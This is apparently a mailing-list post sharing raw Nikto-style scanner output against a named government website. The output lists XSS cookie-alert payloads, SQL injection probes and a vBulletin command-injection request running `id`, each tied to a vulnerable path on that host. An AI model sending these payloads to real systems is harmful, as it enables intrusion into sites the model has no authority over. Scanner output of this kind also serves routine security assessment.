\"><script>alert(document.cookie)</script> : MySQL Eventum is  
vulnerable to XSS in the email field.
+ OSVDB-12606: GET /eventum/index.php?err=3&email= 
\"><script>alert(document.cookie)</script> : MySQL Eventum is  
vulnerable to XSS in the email field.
+ OSVDB-12607: GET /eventum/forgot_password.php?email= 
\"><script>alert(document.cookie)</script> : MySQL Eventum is  
vulnerable to XSS in the email field.
+ OSVDB-2119: GET /shopexd.asp?catalogid='42 : VP-ASP Shopping Cart  
5.0 contains multiple SQL injection vulnerabilities. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0560 
, http://www.securityfocus.com/bid/8159
+ OSVDB-2562: GET /login/sm_login_screen.php?error= 
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and  
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /login/sm_login_screen.php?uid= 
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and  
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error= 
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and  
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid= 
\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and  
Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</ 
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-2695: GET /photo/ : My Photo Gallery pre 3.6 contains multiple  
vulnerabilities including .. traversal, unspecified vulnerabilities,  
and remote management interface access.
+ OSVDB-2790: GET /index.php?vo=\"><script>alert(document.cookie);</ 
script> : Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp? 
id=1&cat=<script>alert('test')</script> : VP-ASP prior to 4.50 are  
vulnerable to XSS attacks
+ OSVDB-3092: GET /archive/ : This might be interesting...
+ OSVDB-3092: GET /clients/ : This might be interesting...
+ OSVDB-3092: GET /directory/ : This might be interesting...
+ OSVDB-3092: GET /forum/ : This might be interesting...
+ OSVDB-3092: GET /home/ : This might be interesting...
+ OSVDB-3092: GET /mp3/ : This might be interesting...
+ OSVDB-3092: GET /new : This may be interesting...
+ OSVDB-3092: GET /new/ : This might be interesting...
+ OSVDB-3092: GET /news : This may be interesting...
+ OSVDB-17670: GET /vc30/ : Site Server sample files.  This might be  
interesting...
+ OSVDB-3093: GET /adv/gm001-mc/ : This might be interesting... has  
been seen in web logs from an unknown scanner.
+ OSVDB-3233: GET /netbasic/websinfo.bas : Novell Netware 5.1 contains  
Novonyx default files which reveal system information. All default  
files should be removed.
+ OSVDB-3280: GET /forum/memberlist.php? 
s=23c37cf1af5d2ad05f49361b0407ad9e&what=\"> 
\"<script>javascript:alert(document.cookie)</script> : Vbulletin 2.2.9  
and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-3289: GET /firewall/policy/dlg? 
q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz :  
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities  
in various administrative pages.
+ OSVDB-3294: GET /firewall/policy/policy? 
fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> :  
Fortigate firewall 2.50 and prior contains several CSS vulnerabilities  
in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel? 
file=blacklist&name=b<script>alert('Vulnerable')</ 
script>&startline=0 : Fortigate firewall 2.50 and prior contains  
several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel? 
file=whitelist&name=a<script>alert('Vulnerable')</ 
script>&startline=0(naturally) : Fortigate firewall 2.50 and prior  
contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector? 
button=status,monitor,session&button_url=/system/status/status,/system/ 
status/moniter\"><script>alert('Vulnerable')</script>,/system/status/ 
session : Fortigate firewall 2.50 and prior contains several CSS  
vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector? 
button=status,monitor,session&button_url=/system/status/status 
\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/ 
status/session : Fortigate firewall 2.50 and prior contains several  
CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session 
\"><script>alert('Vulnerable')</script>&button_url=/system/status/ 
status,/system/status/moniter,/system/status/session : Fortigate  
firewall 2.50 and prior contains several CSS vulnerabilities in  
various administrative pages.
+ OSVDB-3299: GET /forumscalendar.php? 
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo 
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command  
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /forumzcalendar.php? 
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo 
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command  
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /htforumcalendar.php? 
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo 
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command  
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /vbcalendar.php? 
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo 
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command  
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: GET /vbulletincalendar.php? 
calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo 
%20%60id%20%60;die();echo%22 : Vbulletin allows remote command  
execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp? 
person=<script>alert('Vulnerable')</script> : BEA WebLogic 8.1 and  
below are vulnerable to Cross Site Scripting (XSS) in example code. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624 
. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</ 
script> : Ecometry's SGDynamo is vulnerable to Cross Site Scripting  
(XSS). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0375. http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi? 
key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</ 
script> : Aktivate Shopping Cart 1.03 and lower are vulnerable to  
Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1212 
, http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4262: GET /addressbook.php?\"><script>alert(Vulnerable)</ 
script><!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site  
Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4265: GET /help.php?chapter=<script>alert('Vulnerable')</ 
script> : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting  
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=<script>alert(\"test\")</ 
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4357: GET /acart2_0/error.asp?msg=<script>alert(\"test\")</ 
script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=<script>alert(\"test 
\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=<script>alert(\"test 
\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-5097: GET /wwwping/index.stm? 
wwwsite=<script>alert(document.cookie)</script> : Sambar Server  
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/create.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/info.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/search.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/template.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/update.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm? 
path=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/info.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/update.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm? 
name=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5102: GET /syshelp/stmex.stm? 
foo=123&bar=<script>alert(document.cookie)</script> : Sambar Server  
default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm? 
func=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm? 
pkg=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm? 
pkg=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5106: GET /netutils/ipdata.stm? 
ipaddr=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5107: GET /netutils/findata.stm? 
host=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5107: GET /netutils/findata.stm? 
user=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-5108: GET /sysuser/docmgr/search.stm? 
query=<script>alert(document.cookie)</script> : Sambar Server default  
script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-701: GET /pls/dadname/htp.print? 
cbuf=<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable  
to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html 
.
+ OSVDB-20954: GET /shopadmin.asp?Password=abc&UserName= 
\"><script>alert(foo)</script> : VP-ASP Shopping Cart 5.50  
shopadmin.asp UserName Variable XSS.
+ OSVDB-20406: GET /phpinfo.php? 
GLOBALS[test]=<script>alert(document.cookie);</script> : PHP contains  
a flaw that allows a remote cross site scripting attack.
+ OSVDB-24484: GET /phpinfo.php? 
cx 
[]= 
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 
<script>alert(foo)</script> : PHP 5.1.2 and 4.4.2 phpinfo() Function  
Long Array XSS
+ OSVDB-35935: GET /rpc.php?q=\"><script>alert(document.cookie)</ 
script> : Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the  
q variable.
+ 3577 items checked: 216 item(s) reported on remote host
+ End Time:        2009-09-05 1:09:01 (444 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Test Options: -h www.mardi.gov.my -output mardi.txt
---------------------------------------------------------------------------
Maybe someone might be share this result and give your comment about  
this. Your comment are need and hope we can do something about it.  
Thanks
Mohd Fazli Azran
PCBSD Malaysia





More information about the PCBSD-malaysia mailing list